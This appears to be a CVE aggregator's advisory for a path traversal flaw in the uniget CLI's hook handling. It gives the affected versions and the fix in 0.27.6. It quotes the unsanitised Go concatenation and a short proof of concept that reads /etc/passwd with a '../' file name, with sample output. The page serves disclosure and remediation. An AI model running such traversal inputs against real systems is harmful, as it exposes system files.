CVE-2026-55062: Path Traversal

Published Aug 17, 2026
·
Updated

Summary Path Traversal vulnerability in hook filename handling allows attackers to access and manipulate arbitrary files outside the hooks directory via directory escape sequences like passwd.

Details File: hooks.go Lines 135-160 hookFileName := args[0] // User input not validated hookFile = preInstallHooksDir + "/" + hookFileName // Direct concatenation

Hook filenames are concatenated directly without sanitizing ../ sequences, allowing directory traversal.

PoC Step 1: Set cat as editor export EDITOR="cat" Step 2: Read /etc/passwd via path traversal

./uniget hooks edit --type=pre-install "../../../../etc/passwd"

Step 3: Output shows file contents root:x:0:0:root:/root:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin [...]

<img width="1014" height="178" alt="image" src="https://github.com/user-attachments/assets/0db0fe7e-533b-4d8e-a346-81886ce866ab" />

Affected Software

1 affected componentFixes available
go/gitlab.com/uniget-org/cli<0.27.6
0.27.6

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade go/gitlab.com/uniget-org/cli to a version that resolves this vulnerability.

    Fixed in 0.27.6

Event History

Aug 17, 2026
Advisory Published
via GitHub·05:46 PM
Data Sourced
via GitHub·05:46 PM
DescriptionWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-55062?

CVE-2026-55062 has a risk level of 52, indicating a moderate severity path traversal vulnerability.

2

How do I fix CVE-2026-55062?

To fix CVE-2026-55062, update to the latest version of the software that addresses this vulnerability.

3

What type of vulnerability is CVE-2026-55062?

CVE-2026-55062 is classified as a path traversal vulnerability, allowing unauthorized file access.

4

Who is affected by CVE-2026-55062?

Users of the go/gitlab.com/uniget-org/cli software that utilize hook filename handling are affected by CVE-2026-55062.

5

What can attackers do with CVE-2026-55062?

Attackers exploiting CVE-2026-55062 can access and manipulate arbitrary files outside of the hooks directory.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203